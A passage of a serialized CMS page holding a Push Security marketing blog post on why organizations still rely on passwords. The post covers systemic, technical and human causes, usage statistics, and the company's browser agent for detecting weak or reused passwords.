0668,"data":110669},[],{},{"nodeType":312,"data":110671,"content":110674},{"target":110672},{"sys":110673},{"id":101326,"type":317,"linkType":318},[],{"nodeType":231,"data":110676,"content":110677},{},[],{"nodeType":169,"data":110679,"content":110680},{},[110681],{"nodeType":173,"value":18605,"marks":110682,"data":110684},[110683],{"type":370},{},{"nodeType":178,"data":110686,"content":110687},{},[110688],{"nodeType":173,"value":98309,"marks":110689,"data":110690},[],{},{"nodeType":178,"data":110692,"content":110693},{},[110694,110697,110703],{"nodeType":173,"value":61741,"marks":110695,"data":110696},[],{},{"nodeType":186,"data":110698,"content":110699},{"uri":98320},[110700],{"nodeType":173,"value":1472,"marks":110701,"data":110702},[],{},{"nodeType":173,"value":1477,"marks":110704,"data":110705},[],{},{"items":110707},[110708,110710],{"sys":110709,"name":505},{"id":504},{"sys":110711,"name":509},{"id":508},{"items":110713},[110714],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":110715},{"url":1496},{"__typename":1528,"sys":110717,"content":110718,"title":98341,"synopsis":98342,"hashTags":118,"publishedDate":98343,"slug":98344,"tagsCollection":111278,"authorsCollection":111284},{"id":97694},{"json":110719},{"nodeType":165,"data":110720,"content":110721},{},[110722,110728,110734,110740,110743,110750,110756,110772,110802,110807,110823,110828,110848,110851,110858,110864,110877,110890,110895,110901,110907,110912,110925,110928,110935,110941,110947,110953,110959,110962,110969,110975,110981,110997,111003,111010,111049,111055,111060,111066,111071,111077,111080,111087,111100,111106,111140,111150,111153,111160,111166,111172,111202,111208,111225,111230,111235,111238,111245,111251,111267,111272],{"nodeType":178,"data":110723,"content":110724},{},[110725],{"nodeType":173,"value":97703,"marks":110726,"data":110727},[],{},{"nodeType":178,"data":110729,"content":110730},{},[110731],{"nodeType":173,"value":97710,"marks":110732,"data":110733},[],{},{"nodeType":178,"data":110735,"content":110736},{},[110737],{"nodeType":173,"value":97717,"marks":110738,"data":110739},[],{},{"nodeType":231,"data":110741,"content":110742},{},[],{"nodeType":169,"data":110744,"content":110745},{},[110746],{"nodeType":173,"value":97727,"marks":110747,"data":110749},[110748],{"type":370},{},{"nodeType":178,"data":110751,"content":110752},{},[110753],{"nodeType":173,"value":97735,"marks":110754,"data":110755},[],{},{"nodeType":178,"data":110757,"content":110758},{},[110759,110762,110769],{"nodeType":173,"value":97742,"marks":110760,"data":110761},[],{},{"nodeType":186,"data":110763,"content":110764},{"uri":97747},[110765],{"nodeType":173,"value":97750,"marks":110766,"data":110768},[110767],{"type":194},{},{"nodeType":173,"value":97755,"marks":110770,"data":110771},[],{},{"nodeType":250,"data":110773,"content":110774},{},[110775,110784,110793],{"nodeType":254,"data":110776,"content":110777},{},[110778],{"nodeType":178,"data":110779,"content":110780},{},[110781],{"nodeType":173,"value":97768,"marks":110782,"data":110783},[],{},{"nodeType":254,"data":110785,"content":110786},{},[110787],{"nodeType":178,"data":110788,"content":110789},{},[110790],{"nodeType":173,"value":97778,"marks":110791,"data":110792},[],{},{"nodeType":254,"data":110794,"content":110795},{},[110796],{"nodeType":178,"data":110797,"content":110798},{},[110799],{"nodeType":173,"value":97788,"marks":110800,"data":110801},[],{},{"nodeType":312,"data":110803,"content":110806},{"target":110804},{"sys":110805},{"id":97795,"type":317,"linkType":318},[],{"nodeType":178,"data":110808,"content":110809},{},[110810,110813,110820],{"nodeType":173,"value":97801,"marks":110811,"data":110812},[],{},{"nodeType":186,"data":110814,"content":110815},{"uri":97806},[110816],{"nodeType":173,"value":97809,"marks":110817,"data":110819},[110818],{"type":194},{},{"nodeType":173,"value":97814,"marks":110821,"data":110822},[],{},{"nodeType":312,"data":110824,"content":110827},{"target":110825},{"sys":110826},{"id":97821,"type":317,"linkType":318},[],{"nodeType":178,"data":110829,"content":110830},{},[110831,110834,110838,110841,110845],{"nodeType":173,"value":97827,"marks":110832,"data":110833},[],{},{"nodeType":173,"value":97831,"marks":110835,"data":110837},[110836],{"type":370},{},{"nodeType":173,"value":97836,"marks":110839,"data":110840},[],{},{"nodeType":173,"value":5440,"marks":110842,"data":110844},[110843],{"type":370},{},{"nodeType":173,"value":97844,"marks":110846,"data":110847},[],{},{"nodeType":231,"data":110849,"content":110850},{},[],{"nodeType":169,"data":110852,"content":110853},{},[110854],{"nodeType":173,"value":97854,"marks":110855,"data":110857},[110856],{"type":370},{},{"nodeType":178,"data":110859,"content":110860},{},[110861],{"nodeType":173,"value":97862,"marks":110862,"data":110863},[],{},{"nodeType":178,"data":110865,"content":110866},{},[110867,110870,110874],{"nodeType":173,"value":97869,"marks":110868,"data":110869},[],{},{"nodeType":173,"value":4821,"marks":110871,"data":110873},[110872],{"type":1646},{},{"nodeType":173,"value":97877,"marks":110875,"data":110876},[],{},{"nodeType":178,"data":110878,"content":110879},{},[110880,110883,110887],{"nodeType":173,"value":97884,"marks":110881,"data":110882},[],{},{"nodeType":173,"value":97888,"marks":110884,"data":110886},[110885],{"type":370},{},{"nodeType":173,"value":197,"marks":110888,"data":110889},[],{},{"nodeType":312,"data":110891,"content":110894},{"target":110892},{"sys":110893},{"id":97899,"type":317,"linkType":318},[],{"nodeType":178,"data":110896,"content":110897},{},[110898],{"nodeType":173,"value":97905,"marks":110899,"data":110900},[],{},{"nodeType":178,"data":110902,"content":110903},{},[110904],{"nodeType":173,"value":97912,"marks":110905,"data":110906},[],{},{"nodeType":312,"data":110908,"content":110911},{"target":110909},{"sys":110910},{"id":97919,"type":317,"linkType":318},[],{"nodeType":178,"data":110913,"content":110914},{},[110915,110918,110922],{"nodeType":173,"value":97925,"marks":110916,"data":110917},[],{},{"nodeType":173,"value":97929,"marks":110919,"data":110921},[110920],{"type":370},{},{"nodeType":173,"value":97934,"marks":110923,"data":110924},[],{},{"nodeType":231,"data":110926,"content":110927},{},[],{"nodeType":169,"data":110929,"content":110930},{},[110931],{"nodeType":173,"value":97944,"marks":110932,"data":110934},[110933],{"type":370},{},{"nodeType":178,"data":110936,"content":110937},{},[110938],{"nodeType":173,"value":97952,"marks":110939,"data":110940},[],{},{"nodeType":178,"data":110942,"content":110943},{},[110944],{"nodeType":173,"value":97959,"marks":110945,"data":110946},[],{},{"nodeType":178,"data":110948,"content":110949},{},[110950],{"nodeType":173,"value":97966,"marks":110951,"data":110952},[],{},{"nodeType":178,"data":110954,"content":110955},{},[110956],{"nodeType":173,"value":97973,"marks":110957,"data":110958},[],{},{"nodeType":231,"data":110960,"content":110961},{},[],{"nodeType":169,"data":110963,"content":110964},{},[110965],{"nodeType":173,"value":97983,"marks":110966,"data":110968},[110967],{"type":370},{},{"nodeType":178,"data":110970,"content":110971},{},[110972],{"nodeType":173,"value":97991,"marks":110973,"data":110974},[],{},{"nodeType":178,"data":110976,"content":110977},{},[110978],{"nodeType":173,"value":97998,"marks":110979,"data":110980},[],{},{"nodeType":178,"data":110982,"content":110983},{},[110984,110987,110994],{"nodeType":173,"value":98005,"marks":110985,"data":110986},[],{},{"nodeType":186,"data":110988,"content":110989},{"uri":98010},[110990],{"nodeType":173,"value":98013,"marks":110991,"data":110993},[110992],{"type":194},{},{"nodeType":173,"value":98018,"marks":110995,"data":110996},[],{},{"nodeType":178,"data":110998,"content":110999},{},[111000],{"nodeType":173,"value":98025,"marks":111001,"data":111002},[],{},{"nodeType":178,"data":111004,"content":111005},{},[111006],{"nodeType":173,"value":98032,"marks":111007,"data":111009},[111008],{"type":370},{},{"nodeType":250,"data":111011,"content":111012},{},[111013,111022,111031,111040],{"nodeType":254,"data":111014,"content":111015},{},[111016],{"nodeType":178,"data":111017,"content":111018},{},[111019],{"nodeType":173,"value":81804,"marks":111020,"data":111021},[],{},{"nodeType":254,"data":111023,"content":111024},{},[111025],{"nodeType":178,"data":111026,"content":111027},{},[111028],{"nodeType":173,"value":98055,"marks":111029,"data":111030},[],{},{"nodeType":254,"data":111032,"content":111033},{},[111034],{"nodeType":178,"data":111035,"content":111036},{},[111037],{"nodeType":173,"value":98065,"marks":111038,"data":111039},[],{},{"nodeType":254,"data":111041,"content":111042},{},[111043],{"nodeType":178,"data":111044,"content":111045},{},[111046],{"nodeType":173,"value":98075,"marks":111047,"data":111048},[],{},{"nodeType":178,"data":111050,"content":111051},{},[111052],{"nodeType":173,"value":98082,"marks":111053,"data":111054},[],{},{"nodeType":312,"data":111056,"content":111059},{"target":111057},{"sys":111058},{"id":98089,"type":317,"linkType":318},[],{"nodeType":178,"data":111061,"content":111062},{},[111063],{"nodeType":173,"value":98095,"marks":111064,"data":111065},[],{},{"nodeType":312,"data":111067,"content":111070},{"target":111068},{"sys":111069},{"id":98102,"type":317,"linkType":318},[],{"nodeType":178,"data":111072,"content":111073},{},[111074],{"nodeType":173,"value":98108,"marks":111075,"data":111076},[],{},{"nodeType":231,"data":111078,"content":111079},{},[],{"nodeType":169,"data":111081,"content":111082},{},[111083],{"nodeType":173,"value":98118,"marks":111084,"data":111086},[111085],{"type":370},{},{"nodeType":178,"data":111088,"content":111089},{},[111090,111093,111097],{"nodeType":173,"value":98126,"marks":111091,"data":111092},[],{},{"nodeType":173,"value":98130,"marks":111094,"data":111096},[111095],{"type":370},{},{"nodeType":173,"value":197,"marks":111098,"data":111099},[],{},{"nodeType":178,"data":111101,"content":111102},{},[111103],{"nodeType":173,"value":98141,"marks":111104,"data":111105},[],{},{"nodeType":178,"data":111107,"content":111108},{},[111109,111112,111116,111119,111123,111126,111130,111133,111137],{"nodeType":173,"value":98148,"marks":111110,"data":111111},[],{},{"nodeType":173,"value":98152,"marks":111113,"data":111115},[111114],{"type":370},{},{"nodeType":173,"value":98157,"marks":111117,"data":111118},[],{},{"nodeType":173,"value":98161,"marks":111120,"data":111122},[111121],{"type":370},{},{"nodeType":173,"value":98166,"marks":111124,"data":111125},[],{},{"nodeType":173,"value":98161,"marks":111127,"data":111129},[111128],{"type":370},{},{"nodeType":173,"value":98174,"marks":111131,"data":111132},[],{},{"nodeType":173,"value":98178,"marks":111134,"data":111136},[111135],{"type":370},{},{"nodeType":173,"value":98183,"marks":111138,"data":111139},[],{},{"nodeType":178,"data":111141,"content":111142},{},[111143,111146],{"nodeType":173,"value":98190,"marks":111144,"data":111145},[],{},{"nodeType":173,"value":98194,"marks":111147,"data":111149},[111148],{"type":370},{},{"nodeType":231,"data":111151,"content":111152},{},[],{"nodeType":169,"data":111154,"content":111155},{},[111156],{"nodeType":173,"value":98205,"marks":111157,"data":111159},[111158],{"type":370},{},{"nodeType":178,"data":111161,"content":111162},{},[111163],{"nodeType":173,"value":98213,"marks":111164,"data":111165},[],{},{"nodeType":178,"data":111167,"content":111168},{},[111169],{"nodeType":173,"value":98220,"marks":111170,"data":111171},[],{},{"nodeType":250,"data":111173,"content":111174},{},[111175,111184,111193],{"nodeType":254,"data":111176,"content":111177},{},[111178],{"nodeType":178,"data":111179,"content":111180},{},[111181],{"nodeType":173,"value":98233,"marks":111182,"data":111183},[],{},{"nodeType":254,"data":111185,"content":111186},{},[111187],{"nodeType":178,"data":111188,"content":111189},{},[111190],{"nodeType":173,"value":98243,"marks":111191,"data":111192},[],{},{"nodeType":254,"data":111194,"content":111195},{},[111196],{"nodeType":178,"data":111197,"content":111198},{},[111199],{"nodeType":173,"value":98253,"marks":111200,"data":111201},[],{},{"nodeType":178,"data":111203,"content":111204},{},[111205],{"nodeType":173,"value":98260,"marks":111206,"data":111207},[],{},{"nodeType":178,"data":111209,"content":111210},{},[111211,111215,111222],{"nodeType":173,"value":98267,"marks":111212,"data":111214},[111213],{"type":370},{},{"nodeType":186,"data":111216,"content":111217},{"uri":98273},[111218],{"nodeType":173,"value":98276,"marks":111219,"data":111221},[111220],{"type":194},{},{"nodeType":173,"value":37,"marks":111223,"data":111224},[],{},{"nodeType":312,"data":111226,"content":111229},{"target":111227},{"sys":111228},{"id":98287,"type":317,"linkType":318},[],{"nodeType":312,"data":111231,"content":111234},{"target":111232},{"sys":111233},{"id":98293,"type":317,"linkType":318},[],{"nodeType":231,"data":111236,"content":111237},{},[],{"nodeType":169,"data":111239,"content":111240},{},[111241],{"nodeType":173,"value":18605,"marks":111242,"data":111244},[111243],{"type":370},{},{"nodeType":178,"data":111246,"content":111247},{},[111248],{"nodeType":173,"value":98309,"marks":111249,"data":111250},[],{},{"nodeType":178,"data":111252,"content":111253},{},[111254,111257,111264],{"nodeType":173,"value":61741,"marks":111255,"data":111256},[],{},{"nodeType":186,"data":111258,"content":111259},{"uri":98320},[111260],{"nodeType":173,"value":1472,"marks":111261,"data":111263},[111262],{"type":194},{},{"nodeType":173,"value":1477,"marks":111265,"data":111266},[],{},{"nodeType":312,"data":111268,"content":111271},{"target":111269},{"sys":111270},{"id":98333,"type":317,"linkType":318},[],{"nodeType":178,"data":111273,"content":111274},{},[111275],{"nodeType":173,"value":37,"marks":111276,"data":111277},[],{},{"items":111279},[111280,111282],{"sys":111281,"name":509},{"id":508},{"sys":111283,"name":505},{"id":504},{"items":111285},[111286],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":111287},{"url":1496},{"__typename":1528,"sys":111289,"content":111290,"title":46314,"synopsis":112267,"hashTags":118,"publishedDate":77669,"slug":46315,"tagsCollection":112268,"authorsCollection":112274},{"id":24759},{"json":111291},{"nodeType":165,"data":111292,"content":111293},{},[111294,111313,111320,111327,111334,111341,111347,111354,111369,111372,111379,111386,111393,111400,111410,111417,111424,111431,111439,111446,111517,111529,111536,111544,111551,111607,111619,111626,111631,111639,111646,111679,111702,111709,111719,111722,111729,111748,111755,111788,111795,111802,111809,111815,111818,111825,111832,111840,111847,111854,111869,111875,111883,111890,111896,111904,111924,111931,111964,111983,111988,112008,112028,112036,112043,112050,112056,112074,112077,112085,112100,112107,112113,112161,112166,112173,112180,112223,112226,112234,112241,112244,112250],{"nodeType":178,"data":111295,"content":111296},{},[111297,111301,111310],{"nodeType":173,"value":111298,"marks":111299,"data":111300},"It wasn’t supposed to be like this. Passwords were supposed to be dead (just ask ",[],{},{"nodeType":186,"data":111302,"content":111304},{"uri":111303},"https://www.cnet.com/news/privacy/gates-predicts-death-of-the-password/",[111305],{"nodeType":173,"value":111306,"marks":111307,"data":111309},"Bill Gates",[111308],{"type":194},{},{"nodeType":173,"value":53584,"marks":111311,"data":111312},[],{},{"nodeType":178,"data":111314,"content":111315},{},[111316],{"nodeType":173,"value":111317,"marks":111318,"data":111319},"Instead, hardworking security pros are left to sit around in community center basements drinking mediocre coffee and commiserating.",[],{},{"nodeType":178,"data":111321,"content":111322},{},[111323],{"nodeType":173,"value":111324,"marks":111325,"data":111326},"“I admit it. My users still use passwords.”",[],{},{"nodeType":178,"data":111328,"content":111329},{},[111330],{"nodeType":173,"value":111331,"marks":111332,"data":111333},"“Yeah, mine too. I’ve been telling people we’re rolling out passkeys for three years now. I’m not sure how much longer I can keep this up …”",[],{},{"nodeType":178,"data":111335,"content":111336},{},[111337],{"nodeType":173,"value":111338,"marks":111339,"data":111340},"Somber nodding all around. Hugs. A few chocolate-chip cookies on paper napkins.",[],{},{"nodeType":312,"data":111342,"content":111346},{"target":111343},{"sys":111344},{"id":111345,"type":317,"linkType":318},"4Wt29DxSSczFt5THWkuIiS",[],{"nodeType":178,"data":111348,"content":111349},{},[111350],{"nodeType":173,"value":111351,"marks":111352,"data":111353},"This is a no-judgment zone here at Push Security. So let’s take a look at why we’re still stuck with passwords, how attackers are increasingly exploiting weak credentials to infiltrate organizations, and how Push can help you get visibility and control of all your workforce identities.",[],{},{"nodeType":178,"data":111355,"content":111356},{},[111357,111361,111365],{"nodeType":173,"value":111358,"marks":111359,"data":111360},"We’ll also cover how you can use Push’s latest feature, ",[],{},{"nodeType":173,"value":2578,"marks":111362,"data":111364},[111363],{"type":370},{},{"nodeType":173,"value":111366,"marks":111367,"data":111368},", to require that employees use strong, unique passwords. Push automatically detects when employees have weak, reused, or stolen passwords and then guides them to update their password using in-browser messaging — even on apps that don’t natively support administrative control of password posture.",[],{},{"nodeType":231,"data":111370,"content":111371},{},[],{"nodeType":169,"data":111373,"content":111374},{},[111375],{"nodeType":173,"value":111376,"marks":111377,"data":111378},"3 reasons why we’re still stuck with passwords",[],{},{"nodeType":178,"data":111380,"content":111381},{},[111382],{"nodeType":173,"value":111383,"marks":111384,"data":111385},"At the risk of preaching to the choir, let’s review why we’re still stuck with passwords. ",[],{},{"nodeType":178,"data":111387,"content":111388},{},[111389],{"nodeType":173,"value":111390,"marks":111391,"data":111392},"It’s worth stating the Push perspective up front: We’re not here to push the narrative that you must completely get rid of passwords. To begin with, it’s not easy to get rid of them. Like the imaginary scene from the passwordless support group, we’ve lived the reality of this.",[],{},{"nodeType":178,"data":111394,"content":111395},{},[111396],{"nodeType":173,"value":111397,"marks":111398,"data":111399},"What we observe across our install base for the Push browser agent reinforces this reality. For the last 1 million or so logins that Push recorded, more than a quarter (26%) were password logins.",[],{},{"nodeType":3769,"data":111401,"content":111402},{},[111403],{"nodeType":178,"data":111404,"content":111405},{},[111406],{"nodeType":173,"value":111407,"marks":111408,"data":111409},"For the last 1M+ logins that the Push browser agent observed, more than a quarter were password logins.",[],{},{"nodeType":178,"data":111411,"content":111412},{},[111413],{"nodeType":173,"value":111414,"marks":111415,"data":111416},"Of those password logins, 18% had a security issue with the password — reused, easily guessable, already leaked in a public breach list, or actively for sale in criminal forums.",[],{},{"nodeType":178,"data":111418,"content":111419},{},[111420],{"nodeType":173,"value":111421,"marks":111422,"data":111423},"Yet when strong, unique passwords are used in conjunction with MFA, they can provide a powerful line of defense. Indeed, in cases where onboarding an app to SSO isn’t possible (for reasons we’ll cover below), a strong, unique password plus MFA is the most pragmatic solution you can achieve.",[],{},{"nodeType":178,"data":111425,"content":111426},{},[111427],{"nodeType":173,"value":111428,"marks":111429,"data":111430},"Here’s why bad passwords persist, and why it matters.",[],{},{"nodeType":235,"data":111432,"content":111433},{},[111434],{"nodeType":173,"value":111435,"marks":111436,"data":111438},"Systemic reasons",[111437],{"type":370},{},{"nodeType":178,"data":111440,"content":111441},{},[111442],{"nodeType":173,"value":111443,"marks":111444,"data":111445},"If we zoom out, there are several systemic reasons that contribute to the persistence of password security issues:",[],{},{"nodeType":250,"data":111447,"content":111448},{},[111449,111476,111502],{"nodeType":254,"data":111450,"content":111451},{},[111452],{"nodeType":178,"data":111453,"content":111454},{},[111455,111460,111464,111472],{"nodeType":173,"value":111456,"marks":111457,"data":111459},"Self-adoption of work apps",[111458],{"type":370},{},{"nodeType":173,"value":111461,"marks":111462,"data":111463}," makes it extremely difficult to know all the workforce identities that exist across your environment, let alone whether they’re using a secure authentication method, or the strength or uniqueness of their password. Push’s ",[],{},{"nodeType":186,"data":111465,"content":111466},{"uri":4492},[111467],{"nodeType":173,"value":111468,"marks":111469,"data":111471},"own research",[111470],{"type":194},{},{"nodeType":173,"value":111473,"marks":111474,"data":111475}," shows that for an average organization, each employee has 15 identities.",[],{},{"nodeType":254,"data":111477,"content":111478},{},[111479],{"nodeType":178,"data":111480,"content":111481},{},[111482,111487,111491,111498],{"nodeType":173,"value":111483,"marks":111484,"data":111486},"Apps optimize signups for low friction, not security.",[111485],{"type":370},{},{"nodeType":173,"value":111488,"marks":111489,"data":111490}," That often results in multiple authentication methods tied to any given account because local password accounts can still persist even after SSO onboarding — a phenomenon that we call ",[],{},{"nodeType":186,"data":111492,"content":111493},{"uri":832},[111494],{"nodeType":173,"value":835,"marks":111495,"data":111497},[111496],{"type":194},{},{"nodeType":173,"value":111499,"marks":111500,"data":111501}," because they provide attackers with a way around a company’s enterprise SSO solution. These local accounts represent a significant risk, and most are invisible. Which brings us to …",[],{},{"nodeType":254,"data":111503,"content":111504},{},[111505],{"nodeType":178,"data":111506,"content":111507},{},[111508,111513],{"nodeType":173,"value":111509,"marks":111510,"data":111512},"Many apps provide very little information to admins about the posture of accounts",[111511],{"type":370},{},{"nodeType":173,"value":111514,"marks":111515,"data":111516}," on that service, and even fewer offer management options to address security issues on those accounts. Some services provide no information at all about which accounts can even access a given tenant.",[],{},{"nodeType":178,"data":111518,"content":111519},{},[111520,111525],{"nodeType":173,"value":111521,"marks":111522,"data":111524},"The impact: ",[111523],{"type":370},{},{"nodeType":173,"value":111526,"marks":111527,"data":111528},"These systemic factors contribute to what we see many organizations grappling with: Known visibility gaps in their workforce identities, which are scattered across many more third-party apps than they imagine, and unknown account security risks for both managed and unmanaged apps.",[],{},{"nodeType":178,"data":111530,"content":111531},{},[111532],{"nodeType":173,"value":111533,"marks":111534,"data":111535},"These gaps open up a large attack surface for organizations. The 2024 Verizon DBIR found that 79% of web application compromises were the result of breached creds, and researchers at IBM reported last year that they observed a 71% year-over-year increase in cyberattacks using stolen or compromised credentials.",[],{},{"nodeType":235,"data":111537,"content":111538},{},[111539],{"nodeType":173,"value":111540,"marks":111541,"data":111543},"Technical reasons",[111542],{"type":370},{},{"nodeType":178,"data":111545,"content":111546},{},[111547],{"nodeType":173,"value":111548,"marks":111549,"data":111550},"There are also several technical reasons why bad passwords persist:",[],{},{"nodeType":250,"data":111552,"content":111553},{},[111554,111581],{"nodeType":254,"data":111555,"content":111556},{},[111557],{"nodeType":178,"data":111558,"content":111559},{},[111560,111563,111573,111577],{"nodeType":173,"value":37,"marks":111561,"data":111562},[],{},{"nodeType":186,"data":111564,"content":111566},{"uri":111565},"https://www.ncsc.gov.uk/blog-post/passkeys-not-perfect-getting-better",[111567],{"nodeType":173,"value":111568,"marks":111569,"data":111572},"Going passwordless is hard",[111570,111571],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":111574,"data":111576},[111575],{"type":370},{},{"nodeType":173,"value":111578,"marks":111579,"data":111580},"because it requires a large investment of time, money, and training for end-users. In environments with a mix of older and newer infrastructure, it can be challenging to get complete coverage, and employees may struggle with the transition to device-based authentication (especially when they lose their device and aren’t familiar with how to regain account access).",[],{},{"nodeType":254,"data":111582,"content":111583},{},[111584],{"nodeType":178,"data":111585,"content":111586},{},[111587,111592,111596,111603],{"nodeType":173,"value":111588,"marks":111589,"data":111591},"Many apps do not even provide a SAML option",[111590],{"type":370},{},{"nodeType":173,"value":111593,"marks":111594,"data":111595},", making it difficult to onboard every business app to SSO even once you know about them all. Last we checked, only about 30% of commonly used work apps supported SAML. Even when apps do provide the option, many charge the infamous “",[],{},{"nodeType":186,"data":111597,"content":111598},{"uri":27492},[111599],{"nodeType":173,"value":4475,"marks":111600,"data":111602},[111601],{"type":194},{},{"nodeType":173,"value":111604,"marks":111605,"data":111606},",” putting the feature behind enterprise plans.",[],{},{"nodeType":178,"data":111608,"content":111609},{},[111610,111615],{"nodeType":173,"value":111611,"marks":111612,"data":111614},"The impact:",[111613],{"type":370},{},{"nodeType":173,"value":111616,"marks":111617,"data":111618}," What ends up happening in many organizations is a patchwork of login methods, including passwords, passkeys, OIDC, and SAML. Looking at data from Push’s install base, we see on average around 15,000 accounts per 1,000 users, with 5,900+ outside of SSO — about 40%. ",[],{},{"nodeType":178,"data":111620,"content":111621},{},[111622],{"nodeType":173,"value":111623,"marks":111624,"data":111625},"That means more — not less — for a security and IT team to manage, often without the visibility or control they need to do so effectively.",[],{},{"nodeType":312,"data":111627,"content":111630},{"target":111628},{"sys":111629},{"id":71430,"type":317,"linkType":318},[],{"nodeType":235,"data":111632,"content":111633},{},[111634],{"nodeType":173,"value":111635,"marks":111636,"data":111638},"Human reasons",[111637],{"type":370},{},{"nodeType":178,"data":111640,"content":111641},{},[111642],{"nodeType":173,"value":111643,"marks":111644,"data":111645},"Finally, there are a lot of human reasons why poor passwords persist, all of them familiar and intractable:",[],{},{"nodeType":250,"data":111647,"content":111648},{},[111649,111664],{"nodeType":254,"data":111650,"content":111651},{},[111652],{"nodeType":178,"data":111653,"content":111654},{},[111655,111660],{"nodeType":173,"value":111656,"marks":111657,"data":111659},"Password change fatigue",[111658],{"type":370},{},{"nodeType":173,"value":111661,"marks":111662,"data":111663},", resulting in weak and reused passwords — often driven by incomplete adoption of enterprise password managers or outdated password security policies that require users to rotate passwords frequently. ",[],{},{"nodeType":254,"data":111665,"content":111666},{},[111667],{"nodeType":178,"data":111668,"content":111669},{},[111670,111675],{"nodeType":173,"value":111671,"marks":111672,"data":111674},"Shortcuts that busy humans take",[111673],{"type":370},{},{"nodeType":173,"value":111676,"marks":111677,"data":111678}," to get work done on a daily basis, including reusing passwords across personal and corporate accounts, storing passwords insecurely, and using easier-to-remember passwords over secure, complex ones.  ",[],{},{"nodeType":178,"data":111680,"content":111681},{},[111682,111686,111690,111698],{"nodeType":173,"value":111611,"marks":111683,"data":111685},[111684],{"type":370},{},{"nodeType":173,"value":111687,"marks":111688,"data":111689}," When there’s a large, complex, and largely invisible attack surface made up of these online corporate identities, adversaries profit. Just look at any of the ",[],{},{"nodeType":186,"data":111691,"content":111692},{"uri":77262},[111693],{"nodeType":173,"value":111694,"marks":111695,"data":111697},"major identity attacks",[111696],{"type":194},{},{"nodeType":173,"value":111699,"marks":111700,"data":111701}," of the past year, some of which used password-spraying and credential-stuffing techniques to compromise accounts and pivot to high-value systems and data.",[],{},{"nodeType":178,"data":111703,"content":111704},{},[111705],{"nodeType":173,"value":111706,"marks":111707,"data":111708},"Password reuse also extends the blast radius for any account takeover incident when MFA is missing — a gap that occurs more often than you may think. Typically, 37% of logins observed by Push upon initial deployment into a new customer environment do not use any form of MFA.",[],{},{"nodeType":3769,"data":111710,"content":111711},{},[111712],{"nodeType":178,"data":111713,"content":111714},{},[111715],{"nodeType":173,"value":111716,"marks":111717,"data":111718},"2 in 5 logins observed by Push upon initial deployment into a new customer environment do not use any form of MFA.",[],{},{"nodeType":231,"data":111720,"content":111721},{},[],{"nodeType":169,"data":111723,"content":111724},{},[111725],{"nodeType":173,"value":111726,"marks":111727,"data":111728},"Why identity posture matters more in a SaaS-first world",[],{},{"nodeType":178,"data":111730,"content":111731},{},[111732,111736,111744],{"nodeType":173,"value":111733,"marks":111734,"data":111735},"When most work now happens via the browser on web-based applications, the stakes are even higher for preventing account takeover. That’s because the way that attacks occur in a SaaS environment is ",[],{},{"nodeType":186,"data":111737,"content":111738},{"uri":81621},[111739],{"nodeType":173,"value":111740,"marks":111741,"data":111743},"very different",[111742],{"type":194},{},{"nodeType":173,"value":111745,"marks":111746,"data":111747}," from traditional network attacks, and there are few effective ways to detect and respond post-account compromise.",[],{},{"nodeType":178,"data":111749,"content":111750},{},[111751],{"nodeType":173,"value":111752,"marks":111753,"data":111754},"The average SaaS attack path looks like this:",[],{},{"nodeType":250,"data":111756,"content":111757},{},[111758,111768,111778],{"nodeType":254,"data":111759,"content":111760},{},[111761],{"nodeType":178,"data":111762,"content":111763},{},[111764],{"nodeType":173,"value":111765,"marks":111766,"data":111767},"Attackers gain control of legitimate employee accounts using stolen credentials or via password-spraying or credential-stuffing techniques.",[],{},{"nodeType":254,"data":111769,"content":111770},{},[111771],{"nodeType":178,"data":111772,"content":111773},{},[111774],{"nodeType":173,"value":111775,"marks":111776,"data":111777},"Attackers exfiltrate data.",[],{},{"nodeType":254,"data":111779,"content":111780},{},[111781],{"nodeType":178,"data":111782,"content":111783},{},[111784],{"nodeType":173,"value":111785,"marks":111786,"data":111787},"The end.",[],{},{"nodeType":178,"data":111789,"content":111790},{},[111791],{"nodeType":173,"value":111792,"marks":111793,"data":111794},"Compare that to traditional network or enterprise cloud attacks, which usually involve more complex lateral movement, privilege escalation, and defense evasion.",[],{},{"nodeType":178,"data":111796,"content":111797},{},[111798],{"nodeType":173,"value":111799,"marks":111800,"data":111801},"With limited log data and few response capabilities provided by most SaaS apps, security teams also have few good options to stop the damage of an account takeover once one has occurred. ",[],{},{"nodeType":178,"data":111803,"content":111804},{},[111805],{"nodeType":173,"value":111806,"marks":111807,"data":111808},"That’s why at Push, we advocate for “shifting left,” and preventing account takeover before it happens.",[],{},{"nodeType":312,"data":111810,"content":111814},{"target":111811},{"sys":111812},{"id":111813,"type":317,"linkType":318},"6wIzMu3jBhaas9jtpV48bz",[],{"nodeType":231,"data":111816,"content":111817},{},[],{"nodeType":169,"data":111819,"content":111820},{},[111821],{"nodeType":173,"value":111822,"marks":111823,"data":111824},"How Push helps you ensure strong passwords",[],{},{"nodeType":178,"data":111826,"content":111827},{},[111828],{"nodeType":173,"value":111829,"marks":111830,"data":111831},"There are four capabilities that security teams need in order to regain control over password security issues across their corporate accounts. Here’s how Push accomplishes each one.",[],{},{"nodeType":235,"data":111833,"content":111834},{},[111835],{"nodeType":173,"value":111836,"marks":111837,"data":111839},"1. A reliable inventory of all the apps that employees are using, including work apps and internal apps.",[111838],{"type":370},{},{"nodeType":178,"data":111841,"content":111842},{},[111843],{"nodeType":173,"value":111844,"marks":111845,"data":111846},"Push achieves this by deploying a browser agent to employee browsers that can directly observe their login activity, which feeds the data back into an admin console (or your SIEM/SOAR or other third-party system). You can enforce the installation of the agent using any MDM solution, on all major browsers.",[],{},{"nodeType":178,"data":111848,"content":111849},{},[111850],{"nodeType":173,"value":111851,"marks":111852,"data":111853},"Once the agent is activated, it begins immediately capturing employee logins and produces a real-time inventory of all your work and internal apps. Because Push observes the login directly in the browser, it can identify all the apps and accounts being used by your employees — both managed and unmanaged (shadow IT).",[],{},{"nodeType":178,"data":111855,"content":111856},{},[111857,111861,111865],{"nodeType":173,"value":111858,"marks":111859,"data":111860},"You can also configure Push to monitor ",[],{},{"nodeType":173,"value":67363,"marks":111862,"data":111864},[111863],{"type":1646},{},{"nodeType":173,"value":111866,"marks":111867,"data":111868}," login to a work app, regardless of the associated email domain of the employee. This means you can monitor personal account logins to apps that are commonly used for work.",[],{},{"nodeType":312,"data":111870,"content":111874},{"target":111871},{"sys":111872},{"id":111873,"type":317,"linkType":318},"4ctCB7kBscj12BnfHhk3ro",[],{"nodeType":235,"data":111876,"content":111877},{},[111878],{"nodeType":173,"value":111879,"marks":111880,"data":111882},"2. A way to 